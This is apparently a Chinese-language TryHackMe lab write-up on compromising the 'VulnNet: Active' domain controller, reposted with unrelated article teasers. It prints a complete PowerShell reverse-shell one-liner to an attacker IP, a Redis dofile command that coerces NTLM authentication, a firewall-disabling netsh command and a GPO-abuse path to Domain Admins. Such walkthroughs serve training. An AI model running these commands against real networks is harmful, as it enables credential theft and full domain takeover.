TryHackMe-VulnNet: Active(ez 域渗透)

news2024/11/25 13:09:19

VulnNet: Active

VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。


这应该是我在thm打的最后一个中等难度的域渗透房间了,因为剩下的ad渗透都是定位:难 的房间

经验之谈:非官方的单域渗透靶机往往都有卡死、非常卡的问题,遇到不对劲直接重启靶机就完事了


端口扫描

循例 nmap

在这里插入图片描述

简单主动侦察

使用enum4linux:

enum4linux -a 10.10.134.253

这里能看到域名, 但不完整

在这里插入图片描述

再使用crackmapexec:

在这里插入图片描述

vulnnet.local

smb

smb这里也没东西

在这里插入图片描述

Redis枚举

在上面的端口扫描结果中有一个亮眼的端口就是6379,nmap显示这是redis

在这里插入图片描述

成功连上

但我目前对redis还较为薄弱,thm上有一个redis房间,过段时间再去看看

通过搜索引擎能够找到有关redis读取文件的文章:

在这里插入图片描述

NTLM 回传攻击

NTLM回传攻击在thm的域渗透教程中都是有教过的

通过这个命令能够进行文件读取,由于这里是在域内,思路就是利用这个点,然后访问攻击者开启的薄弱smb服务,然后redis这里就会去尝试进行ntlm身份验证,而攻击者也将获取该账户的ntlm hash

这个思路应该是没有问题的,来尝试一下

使用responder开启服务:

responder -I tun0

redis执行文件读取:

redis-cli -h 10.10.254.117 eval "dofile('//10.14.39.48//hack')" 0

在这里插入图片描述

使用haiti帮助我们快速找到hashcat的类型值

在这里插入图片描述

hashcat直接爆

在这里插入图片描述

SMB枚举

现在我们有了一组初始凭据,做的第一件事当然是回去smb看看有没有什么信息

在这里插入图片描述

在Enterprise-Share里发现一个powershell脚本

在这里插入图片描述

在这里插入图片描述

从这个文件名PurgeIrrelevantData和其内容,很容易能猜测到这可能是个定时脚本

我们可以尝试利用其来reverse shell,payload:

$client = New-Object System.Net.Sockets.TCPClient('10.14.39.48',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述

在这里插入图片描述

nc监听

在这里插入图片描述

getshell

本地提权

看到该账户有个SeImpersonatePrivilege

在这里插入图片描述

直接上msf

在这里插入图片描述

一键开启rdp

在这里插入图片描述

dc这里是有防火墙拦截,所以先把防火墙关了

netsh advfirewall set allprofiles state off

在这里插入图片描述

将我们的账户加入本地管理员组,同时进入rdp

在这里插入图片描述

AD枚举

查看administrator账户,我们会发现它是LA和DA

在这里插入图片描述

虽然我们现在已经彻底拿下了这个DC,但我希望能借此为数不多的域渗透靶机来练习thm所教导的知识,在这里,我将练习sharphound

先开启smbserver

在这里插入图片描述

目标连接

在这里插入图片描述

SharpHound

跑sharphound

在这里插入图片描述

通过刚刚打开的smbserver将扫描结果传回

在这里插入图片描述

BloodHound

开启neo4j

neo4j console

启动bloodhound,并将zip丢进去

在这里插入图片描述

我们利用路径搜索,从我们当前的账户到Domain Admins组有这么一条路径

在这里插入图片描述

AD利用

我们发现我们当前账户有权对security-pol这个gpo进行修改

那么我们将利用它

在rdp中打开mmc

在这里插入图片描述

在用户配置->控制面板设置 新建即时任务

在这里插入图片描述

在这里插入图片描述

将我们的账户添加到DA组

在这里插入图片描述

弄好之后使用gpupdate /force强制立即更新组策略

在这里插入图片描述

此时,我们已经是DA

在这里插入图片描述

游戏结束

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/401656.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Uipath Excel 自动化系列15-Protect Sheet(保护工作表)

活动描述 Protect Sheet(保护工作表):在 Excel 中启用对指定工作表的保护,以便无法对其进行任何其他更改,该活动需与Use Excel File 活动选择的 Excel 文件一起使用。 提示:Protect Sheet活动功能类似Excel文件【审阅】菜单栏下的保护工作簿功能&#…

TencentOS Server 安装 PostgreSQL

TencentOS 简介 2019 年,随着腾讯公司外部客户的需求,以及公司开源协同战略的推进,tlinux 对外开源并进行了品牌升级,升级为 TencentOS Server。TencentOS 包含三大场景,分别如下: TencentOS Server&…

MySQL DQL语句基础(一)

目录 DQL 基本语法 基础查询 1、查询多个字段 2、字段设置别名 3、去除重复记录 条件查询 语法 条件 案例 聚合函数 常见的聚合函数 语法 DQL DQL英文全称是Data Query Language(数据查询语言),数据查询语言,用来查询数据库中表的记录。 基…

java面试-jvm

JVM JVM 是 java 虚拟机,简单来说就是能执行标准 java 字节码的虚拟计算机 JVM 是如何工作的 首先程序在执行之前先要把 Java 代码(.java)转换成字节码(.class),JVM 通过类加载器(ClassLoade…

Linux:创建守护进程,注册信号捕获回调函数,使用shell脚本代码管理守护进程

1.创建守护进程&#xff0c;编译时命名为a.out. 2.在守护进程中注册信号捕捉函数。 3.使用脚本发送自定义信号SIGUSR1给进程a.out。 4.守护进程捕获函数catchSignal&#xff08;&#xff09;捕捉到10号函数SIGUSR1退出进程。 创建守护进程代码&#xff1a; #include <stdi…

第八批国家药品集中采购-(附药品集采目录明细下载)

2023年3月2日&#xff0c;‘国家组织药品联合采购办公室’发出了《全国药品集中采购文件》&#xff0c;宣告了第八批国家组织药品集中采购工作正式开展&#xff0c;其公告中还包含三个附表分别为‘采购品种目录’、‘各地区首年约定采购量’、‘各采购品种首年约定采购量’&…

python for循环中 if else语句缩进对应问题

python for循环中 if else语句缩进对应问题 忙里偷闲&#xff0c;备考计算机二级&#xff0c;发现一个好玩的小知识&#xff0c;想分享一下自己当时的思考以及解决问题的过程 也许点进来的你会莫名其妙&#xff0c;if和else语句的缩进必须对齐&#xff0c;这不是连初学者都一…

【数据结构】带你深入理解栈

一. 栈的基本概念&#x1f4ab;栈是一种特殊的线性表。其只允许在固定的一端进行插入和删除元素的操作&#xff0c;进行数据的插入和删除的一端称作栈顶&#xff0c;另外一端称作栈底。栈不支持随机访问&#xff0c;栈的数据元素遵循后进先出的原则&#xff0c;即LIFO&#xff…

怎么把pdf转换成图片?这个方法你值得拥有

想要高效率的工作&#xff0c;除了需要大家合理安排时间之外&#xff0c;一些能够辅助高效工作的工具也是必不可少的。就拿要把一份pdf文件转换成若干图片来说&#xff0c;如果不知道方法&#xff0c;找不到合适的转换工具&#xff0c;那么想要完成这一任务&#xff0c;势必要花…

万里长征——基础IO

目录 文件常识 回顾C语言的文件操作 系统层面的文件操作 文件操作的本质 文件fd的分配规则及重定向 linux下一切皆文件 详谈缓冲区问题 文件常识 1、文件 文件内容 文件属性 2、空文件也要在磁盘上占据空间。因为空文件虽然内容为空&#xff0c;但它的属性也会占据空…

JVM学习笔记十:执行引擎

0. 前言 声明&#xff1a; 感谢尚硅谷宋红康老师的讲授。 感谢广大网友共享的笔记内容。 B站&#xff1a;https://www.bilibili.com/video/BV1PJ411n7xZ 本文的内容基本来源于宋老师的课件&#xff0c;其中有一些其他同学共享的内容&#xff0c;也有一些自己的理解内容。 1. …

设计模式——工厂方法模式(创建型)

创建型模式提供了创建对象的机制&#xff0c;能够提升已有代码的灵活性和可复用性。一、工厂方法工厂方法模式是一种创建型设计模式&#xff0c;其在父类中提供一个创建对象的方法&#xff0c;允许子类决定实例化对象的类型。问题&#xff1a;假设你正在开发一款物流管理应用。…

STA环境

目录1. CMOS逻辑门2. 波形3. 时钟3.1. 指定时钟create_clock时钟延迟set_clock_latency 时钟不确定度set_clock_uncertainty 跨时钟域set_false_path3.2. 衍生时钟3.3. 虚拟时钟4. 时序路径2.1. 输入路径2.2. 输出路径2.3. 点对点约束本文介绍在执行静态时序分析&#xff08;St…

顺序表的基本操作

目录 一.什么是顺序表 二.顺序表的基本操作 1.初始化 2.增容 3.尾插 4.头插 5.尾删 6.头删 7.指定位置插入 8.指定位置删除 9.打印 10.查找 11.销毁 一.什么是顺序表 顺序表是用一段物理地址连续的存储单元依次存储数据元素的线性结构&#xff0c;一般情况下采用数组…

IBMMQ教程二(window版安装)

下载下载地址&#xff1a;https://public.dhe.ibm.com/ibmdl/export/pub/software/websphere/messaging/mqadv/我这里选择的是9.1.0.0版本安装将下载完成的压缩包解压双击Setup.exe直接运行点击软件需求查看系统配置是否满足&#xff0c;右边绿色的对号说明满足需求&#xff0c…

linux 端口查询命令

任何知识都是用进废退&#xff0c;有段时间没摸linux&#xff0c;这大脑里的知识点仿佛全部消失了&#xff0c;就无语。 索性&#xff0c;再写一篇记录&#xff0c;加强一下记忆&#xff0c;下次需要就看自己的资料好了。lsof命令Linux端口查询命令可以通过lsof实现&#xff1a…

教育小程序开发解决方案

如今无论是国家还是家庭对于教育的重视性也越来越高&#xff0c;都希望自己的孩子能够赢在起跑线上&#xff0c;但是因为工作的缘故许多家长并没有过多的精力去辅导孩子学习&#xff0c;再加上许多家长对于教育也并没有经验与技巧。而这些都充分体现了正确教育的重要性。 那么一…

2023金三银四常见Handler面试总结,附带答案

以下的Handler的面试题都是在面试过程中总结出来比较常见的面试题&#xff0c;现在分享给大家&#xff0c;希望可以帮助你们&#xff01;1.Handler的实现原理从四个方面看Handler、Message、MessageQueue 和 Looper Handler:负责消息的发送和处理 Message:消息对象&#xff0c;…

FL Studio21最新中文版下载及切换语言教程

随着近年来摇滚、电音的发展&#xff0c;越来越多的人开始对电子音乐编曲感兴趣&#xff0c;而电音编曲的首要条件&#xff0c;就是需要一个好的DAW&#xff08;数字音频工作站&#xff09;&#xff0c;常用的DAW有很多&#xff0c;例如Cubase、Nuendo、Pro Tools、 SONAR等等&…

Unity - 搬砖日志 - Texture.mipmapBias 无效的解决方法

文章目录环境原因解決方案Referenes环境 Unity : 2020.3.37f1 Pipeline : BRP 原因 因为美术发现有些贴图太糊&#xff0c;但是经过研究发现&#xff0c;mipmap0就是完全够精度的 但是不可能还要提升贴图的尺寸&#xff0c;因为经过多方咨询&#xff08;咨询TA大佬&#xff0…